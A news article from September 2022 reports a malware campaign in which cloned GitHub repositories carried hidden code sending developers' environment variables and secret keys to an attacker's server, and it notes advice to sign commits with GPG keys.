September 30, 2022


Major developer platform GitHub faced a widespread malware attack and reported 35,000 “code hits” on a day when thousands of Solana (SOL)-based wallets were sold for millions of dollars.

The widespread attack was highlighted by GitHub developer Stephen Lucy, who first reported the incident earlier Wednesday. The developer encountered the problem while reviewing a project he found in a Google search.

So far, various projects from crypto, Golang, Python, js, Bash, Docker and Kubernetes have been found to be affected by the attack. The malware attack targets docker images, install docs, and the npm script, which is a convenient way to group common shell commands for a project.

To trick developers and gain access to critical data, the attacker first creates a fake repository (a repository contains all project files and each file’s revision history) and pushes clones of legitimate projects to GitHub. For example, the following two screenshots show this legitimate crypto miner project and its clone.

Original Crypto Mining Project Source: Github
Cloned Crypto Mining Project Source: Github

Many of these clone repositories were pushed as “pull requests”. Pull requests allow developers to notify others of changes they’ve pushed to a branch in a repository on GitHub.

Related: Nomad reportedly ignored security vulnerability that led to $190 million in exploits

Once the developer falls victim to the malware attack, the entire environment variable (ENV) of the script, application or laptop (electronic applications), is sent to the attacker’s server. ENV includes security keys, AWS access keys, encryption keys and more.

The developer has reported the issue on GitHub and advised developers to sign their revisions to the repository. GPG keys add an extra layer of security to your GitHub accounts and software projects by providing a way to verify all revisions come from a trusted source.